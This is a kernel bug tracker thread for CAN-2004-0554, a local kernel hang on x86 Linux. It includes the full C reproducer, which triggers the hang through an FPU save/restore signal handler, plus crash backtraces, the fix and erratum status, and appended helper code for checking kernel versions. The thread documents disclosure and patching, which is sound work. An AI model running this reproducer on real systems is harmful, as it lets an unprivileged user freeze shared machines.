Bug 125794
| Summary: | CAN-2004-0554 local user can get the kernel to hang | ||
|---|---|---|---|
| Product: | Red Hat Enterprise Linux 3 | Reporter: | Petter Reinholdtsen <pere> |
| Component: | kernel | Assignee: | Ernie Petrides <petrides> |
| Status: | CLOSED ERRATA | QA Contact: | |
| Severity: | medium | Docs Contact: | |
| Priority: | medium | ||
| Version: | 3.0 | CC: | bark, bnocera, greg, holger, jrfuller, k.georgiou, mjc, petrides, riel, shadow, tao, tburke, trondham, woodard |
| Target Milestone: | --- | Keywords: | Security |
| Target Release: | --- | ||
| Hardware: | i386 | ||
| OS: | Linux | ||
| URL: | http://marc.theaimsgroup.com/?l=linux-kernel&m=108681568931323&w=2 | ||
| Whiteboard: | |||
| Fixed In Version: | | Doc Type: | Bug Fix |
| Doc Text: | | Story Points: | --- |
| Clone Of: | | Environment: | |
| Last Closed: | 2004-06-18 00:59:36 UTC | Type: | --- |
| Regression: | --- | Mount Type: | --- |
| Documentation: | --- | CRM: | |
| Verified Versions: | | Category: | --- |
| oVirt Team: | --- | RHEL 7.3 requirements from Atomic Host: | |
| Cloudforms Team: | --- | Target Upstream Version: | |
| Embargoed: | |||
| Bug Depends On: | |||
| Bug Blocks: | 116727 | ||
Description
Petter Reinholdtsen
2004-06-11 14:44:16 UTC
Hello, Petter. Could you please post a test case in this bugzilla report (as well as any possible panic or oops output from the console)? As it stands, there's not enough information in this report to debug a potential problem.

Thanks. -ernie

Sure. Are you on a closed network or something? The second URL contains the source. Here it is:
#include <sys/time.h>
#include <signal.h>
#include <unistd.h>

static void Handler(int ignore)
{
    char fpubuf[108];
    __asm__ __volatile__ ("fsave %0\n" : : "m"(fpubuf));
    write(2, "*", 1);
    __asm__ __volatile__ ("frstor %0\n" : : "m"(fpubuf));
}

int main(int argc, char *argv[])
{
    struct itimerval spec;
    signal(SIGALRM, Handler);
    spec.it_interval.tv_sec=0;
    spec.it_interval.tv_usec=100;
    spec.it_value.tv_sec=0;
    spec.it_value.tv_usec=100;
    setitimer(ITIMER_REAL, &spec, NULL);
    while(1)
        write(1, ".", 1);
    return 0;
}
OK, I reproduced the hang on my test system, got a backtrace too... ;)

Pid: 19752, comm: kernel-hang-bz1
EIP: 0060:[<ffff345c>] CPU: 0
EIP is at 0xffff345c
EFLAGS: 00000202 Not tainted (2.6.5-1.332)
EAX: 00000001 EBX: 12005870 ECX: fef32ea8 EDX: 1958f000
ESI: 1958f000 EDI: fef32ea8 EBP: fef32e48 DS: 007b ES: 007b
CR0: 80050033 CR2: 00c4b720 CR3: 003ab000 CR4: 000006d0
Call Trace:
[<0210dcda>] restore_i387_fxsave+0x18/0x60
[<0210dd38>] restore_i387+0x16/0x65
[<021059e5>] restore_sigcontext+0xf2/0x10c
[<0215b737>] get_user_size+0x30/0x57
[<02105c13>] sys_sigreturn+0x214/0x23a

Hmmm, this backtrace is with a 2.6 kernel btw.... Tried it before rebooting my test box into a RHEL3 kernel ;))

Here is the backtrace (alt-sysrq-p) for the very latest RHEL3 kernel. Definitely looks like

Pid/TGid: 3815/3815, comm: kernel-hang-bz1
EIP: 0060:[<c03ec1cc>] CPU: 0
EIP is at coprocessor_error [kernel] 0x0 (2.4.21-15.5.ELsmp)
ESP: 0060:c0113d14 EFLAGS: 00000206 Not tainted
EAX: 00100000 EBX: bfffc888 ECX: bfffc888 EDX: d9818000
ESI: bfffc888 EDI: d9819fb0 EBP: bfffc830 DS: 0068 ES: 0068 FS: 0000 GS: 0033
CR0: 80050033 CR2: b7566720 CR3: 02553380 CR4: 000006f0
Call Trace:
[<c0113d14>] restore_i387_fxsave [kernel] 0x24 (0xd9819ee4)
[<c0113de8>] restore_i387 [kernel] 0x78 (0xd9819f04)
[<c010b40e>] restore_sigcontext [kernel] 0x10e (0xd9819f18)
[<c010b51d>] sys_sigreturn [kernel] 0xed (0xd9819f94)

And a second alt-sysrq-p trace, of the same hang. Guess it's looping in the fpu restore and exception handling code somewhere?

Pid/TGid: 3815/3815, comm: kernel-hang-bz1
EIP: 0060:[<c01137b7>] CPU: 0
EIP is at save_init_fpu [kernel] 0x17 (2.4.21-15.5.ELsmp)
ESP: 8000:c010cd47 EFLAGS: 00000206 Not tainted
EAX: bfebfbff EBX: d9818000 ECX: 00000068 EDX: d9818000
ESI: d9818000 EDI: c010ce50 EBP: bfffc830 DS: 0068 ES: 0068 FS: 0000 GS: 0033
CR0: 80050033 CR2: b7566720 CR3: 02553380 CR4: 000006f0
Call Trace:
[<c010cd47>] math_error [kernel] 0x17 (0xd9819e18)
[<c0113d14>] restore_i387_fxsave [kernel] 0x24 (0xd9819e34)
[<c012f015>] bh_action [kernel] 0x55 (0xd9819e48)
[<c012eeb7>] tasklet_hi_action [kernel] 0x67 (0xd9819e50)
[<c010db38>] do_IRQ [kernel] 0x148 (0xd9819e84)
[<c0113d14>] restore_i387_fxsave [kernel] 0x24 (0xd9819eb4)
[<c0113d14>] restore_i387_fxsave [kernel] 0x24 (0xd9819ee4)
[<c0113de8>] restore_i387 [kernel] 0x78 (0xd9819f04)
[<c010b40e>] restore_sigcontext [kernel] 0x10e (0xd9819f18)
[<c010b51d>] sys_sigreturn [kernel] 0xed (0xd9819f94)

... and a bunch more, in different functions ...

Pid/TGid: 3815/3815, comm: kernel-hang-bz1
EIP: 0060:[<c03ec1e4>] CPU: 0
EIP is at device_not_available [kernel] 0x0 (2.4.21-15.5.ELsmp)
ESP: 0060:c0113d14 EFLAGS: 00000206 Not tainted
EAX: 00100000 EBX: bfffc888 ECX: bfffc888 EDX: d9818000
ESI: bfffc888 EDI: d9819fb0 EBP: bfffc830 DS: 0068 ES: 0068 FS: 0000 GS: 0033
CR0: 8005003b CR2: b7566720 CR3: 02553380 CR4: 000006f0
Call Trace:
[<c0113d14>] restore_i387_fxsave [kernel] 0x24 (0xd9819ee4)
[<c0113de8>] restore_i387 [kernel] 0x78 (0xd9819f04)
[<c010b40e>] restore_sigcontext [kernel] 0x10e (0xd9819f18)
[<c010b51d>] sys_sigreturn [kernel] 0xed (0xd9819f94)

SysRq : Show Regs
Pid/TGid: 3815/3815, comm: kernel-hang-bz1
EIP: 0060:[<c010d005>] CPU: 0
EIP is at math_state_restore [kernel] 0x5 (2.4.21-15.5.ELsmp)
ESP: c20f:c0113d14 EFLAGS: 00000286 Not tainted
EAX: 8005003b EBX: d9818000 ECX: bfffc888 EDX: 00000068
ESI: bfffc888 EDI: d9819fb0 EBP: bfffc830 DS: 0068 ES: 0068 FS: 0000 GS: 0033
CR0: 80050033 CR2: b7566720 CR3: 02553380 CR4: 000006f0
Call Trace:
[<c0113d14>] restore_i387_fxsave [kernel] 0x24 (0xd9819eb4)
[<c0113d14>] restore_i387_fxsave [kernel] 0x24 (0xd9819ee4)
[<c0113de8>] restore_i387 [kernel] 0x78 (0xd9819f04)
[<c010b40e>] restore_sigcontext [kernel] 0x10e (0xd9819f18)
[<c010b51d>] sys_sigreturn [kernel] 0xed (0xd9819f94)

SysRq : Show Regs
Pid/TGid: 3815/3815, comm: kernel-hang-bz1
EIP: 0060:[<c010d005>] CPU: 0
EIP is at math_state_restore [kernel] 0x5 (2.4.21-15.5.ELsmp)
ESP: c20f:c0113d14 EFLAGS: 00000286 Not tainted
EAX: 8005003b EBX: d9818000 ECX: bfffc888 EDX: 00000068
ESI: bfffc888 EDI: d9819fb0 EBP: bfffc830 DS: 0068 ES: 0068 FS: 0000 GS: 0033
CR0: 80050033 CR2: b7566720 CR3: 02553380 CR4: 000006f0
Call Trace:
[<c0113d14>] restore_i387_fxsave [kernel] 0x24 (0xd9819eb4)
[<c0113d14>] restore_i387_fxsave [kernel] 0x24 (0xd9819ee4)
[<c0113de8>] restore_i387 [kernel] 0x78 (0xd9819f04)
[<c010b40e>] restore_sigcontext [kernel] 0x10e (0xd9819f18)
[<c010b51d>] sys_sigreturn [kernel] 0xed (0xd9819f94)

SysRq : Show Regs
Pid/TGid: 3815/3815, comm: kernel-hang-bz1
EIP: 0060:[<c03ec1cc>] CPU: 0
EIP is at coprocessor_error [kernel] 0x0 (2.4.21-15.5.ELsmp)
ESP: 0060:c0113d14 EFLAGS: 00000206 Not tainted
EAX: 00100000 EBX: bfffc888 ECX: bfffc888 EDX: d9818000
ESI: bfffc888 EDI: d9819fb0 EBP: bfffc830 DS: 0068 ES: 0068 FS: 0000 GS: 0033
CR0: 80050033 CR2: b7566720 CR3: 02553380 CR4: 000006f0
Call Trace:
[<c0113d14>] restore_i387_fxsave [kernel] 0x24 (0xd9819ee4)
[<c0113de8>] restore_i387 [kernel] 0x78 (0xd9819f04)
[<c010b40e>] restore_sigcontext [kernel] 0x10e (0xd9819f18)
[<c010b51d>] sys_sigreturn [kernel] 0xed (0xd9819f94)

SysRq : Show Regs
Pid/TGid: 3815/3815, comm: kernel-hang-bz1
EIP: 0060:[<c03ec1e6>] CPU: 0
EIP is at device_not_available [kernel] 0x2 (2.4.21-15.5.ELsmp)
ESP: 3d14:ffffffff EFLAGS: 00000206 Not tainted
EAX: 00100000 EBX: bfffc888 ECX: bfffc888 EDX: d9818000
ESI: bfffc888 EDI: d9819fb0 EBP: bfffc830 DS: 0068 ES: 0068 FS: 0000 GS: 0033
CR0: 8005003b CR2: b7566720 CR3: 02553380 CR4: 000006f0
Call Trace:
[<c0113d14>] restore_i387_fxsave [kernel] 0x24 (0xd9819ee4)
[<c0113de8>] restore_i387 [kernel] 0x78 (0xd9819f04)
[<c010b40e>] restore_sigcontext [kernel] 0x10e (0xd9819f18)
[<c010b51d>] sys_sigreturn [kernel] 0xed (0xd9819f94)

SysRq : Show Regs
Pid/TGid: 3815/3815, comm: kernel-hang-bz1
EIP: 0060:[<c01355ab>] CPU: 0
EIP is at force_sig_info [kernel] 0x8b (2.4.21-15.5.ELsmp)
ESP: 9e28:00000008 EFLAGS: 00000282 Not tainted
EAX: 00000000 EBX: d9818000 ECX: d992d380 EDX: d992d300
ESI: ffffffff EDI: 00000008 EBP: ffffffff DS: 0068 ES: 0068 FS: 0000 GS: 0033
CR0: 8005003b CR2: b7566720 CR3: 02553380 CR4: 000006f0
Call Trace:
[<c010ce50>] do_coprocessor_error [kernel] 0x0 (0xd9819e10)
[<c010cde8>] math_error [kernel] 0xb8 (0xd9819e18)
[<c0113d14>] restore_i387_fxsave [kernel] 0x24 (0xd9819e34)
[<c01343a2>] timer_bh [kernel] 0x62 (0xd9819e40)
[<c0133dcb>] update_process_times_statistical [kernel] 0x7b (0xd9819e48)
[<c012f015>] bh_action [kernel] 0x55 (0xd9819e54)
[<c012eeb7>] tasklet_hi_action [kernel] 0x67 (0xd9819e5c)
[<c010db38>] do_IRQ [kernel] 0x148 (0xd9819e90)
[<c0113d14>] restore_i387_fxsave [kernel] 0x24 (0xd9819eb4)
[<c0113d14>] restore_i387_fxsave [kernel] 0x24 (0xd9819ee4)
[<c0113de8>] restore_i387 [kernel] 0x78 (0xd9819f04)
[<c010b40e>] restore_sigcontext [kernel] 0x10e (0xd9819f18)
[<c010b51d>] sys_sigreturn [kernel] 0xed (0xd9819f94)

OK, it looks like this bug is being tracked down on the linux-kernel mailing list. We'll make sure all the kernels shipped by Red Hat will get the fix once we all agree on what the right fix is upstream. This code is definitely too subtle for a "quick fix"... ;)

FYI, I got this from a customer: "btw - we're noticing that it doesn't totally kill an SMP machine, but rather throws one of the CPUs into a 100% system-time loop, with a process that you can't kill That tidbit might be of use to the kernel engineering guys"

Thanks, J

Do you have any estimate on when we can expect a new kernel fixing this?
We need to schedule the upgrade and reboot of 850 Red Hat machines, and it would be nice if we could start planning already.

FYI, this bug also affects x86_64 (Opteron) when running a 32bit version of the exploit code. Native 64bit mode is not affected, but the default kernel enables 32bit emulation mode. 32bit mode on ia64 (Itanium) may also be affected (untested).

A fix is in hand (posted in comment #5 of bug 125900). Thanks for the reproducer (in comment #2) and all the extra information. I'll post more information when the fix is committed to RHEL3 U3 and also about what our plans are for issuing an RHSA erratum.

*** Bug 125968 has been marked as a duplicate of this bug. ***

Allocated CAN-2004-0554

A fix for this problem has just been committed to the RHEL3 U3 patch pool this evening (in kernel version 2.4.21-15.11.EL). I will update this bug report again as soon as a (pre-U3) security advisory is available.

Petter, in response to your comment #12, there is a Red Hat Security Advisory in the works (RHSA-2004:255) for this bug and two other problems. Best case is that it will become available late tonight (Thursday) on RHN, but it's more likely to first be available tomorrow (Friday). When the Errata is pushed, this bug report will automatically be updated and closed.

An erratum has been issued which should help the problem described in this bug report. This report is therefore being closed with a resolution of ERRATA. For more information on the solution and/or where to find the updated files, please follow the link below. You may reopen this bug report if the solution does not work for you.

http://rhn.redhat.com/errata/RHSA-2004-255.html
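
For anyone planning a rollout across many machines, here is a minimal sketch of how a host could check its running kernel against the build mentioned in this report. It assumes release strings of the form `2.4.21-15.11.EL` as reported by `uname(2)`. The threshold is simply the U3 patch pool version quoted above; the kernel actually shipped with the advisory may carry a different version string, so take the real value from the erratum. The names `krel_parse`, `krel_at_least` and `running_kernel_at_least` are hypothetical helpers, not part of any Red Hat tool.

```c
#include <stdio.h>
#include <string.h>
#include <sys/utsname.h>

/* Numeric fields of a release string such as "2.4.21-15.11.ELsmp":
 * v[0..2] hold the base kernel version, v[3..4] the vendor build number. */
struct krel {
    int v[5];
};

/* Parse "A.B.C-D.E<suffix>" into k. Returns 0 on success, -1 if the
 * string does not have that layout. A missing E (e.g. "2.4.21-20.EL")
 * is treated as 0. */
int krel_parse(const char *s, struct krel *k)
{
    int n;

    memset(k, 0, sizeof *k);
    n = sscanf(s, "%d.%d.%d-%d.%d",
               &k->v[0], &k->v[1], &k->v[2], &k->v[3], &k->v[4]);
    return n >= 4 ? 0 : -1;
}

/* Returns 1 if release has the same base version as fixed and a build
 * number that is equal or newer, 0 if the build number is older, and -1
 * if either string cannot be parsed or the base versions differ (builds
 * of different base kernels are not comparable this way). */
int krel_at_least(const char *release, const char *fixed)
{
    struct krel r, f;
    int i;

    if (krel_parse(release, &r) != 0 || krel_parse(fixed, &f) != 0)
        return -1;
    for (i = 0; i < 3; i++)
        if (r.v[i] != f.v[i])
            return -1;
    for (i = 3; i < 5; i++)
        if (r.v[i] != f.v[i])
            return r.v[i] > f.v[i];
    return 1;
}

/* Same check against the kernel this process is running on. */
int running_kernel_at_least(const char *fixed)
{
    struct utsname u;

    if (uname(&u) != 0)
        return -1;
    return krel_at_least(u.release, fixed);
}
```

Calling `running_kernel_at_least("2.4.21-15.11.EL")` from a small `main` and reporting hosts where it returns 0 would give a list of machines still to be upgraded. A result of -1 is deliberately kept separate: the 2.6.5-1.332 kernel in the first backtrace compares as "not comparable" rather than "newer", since a higher base version says nothing about whether the fix is present.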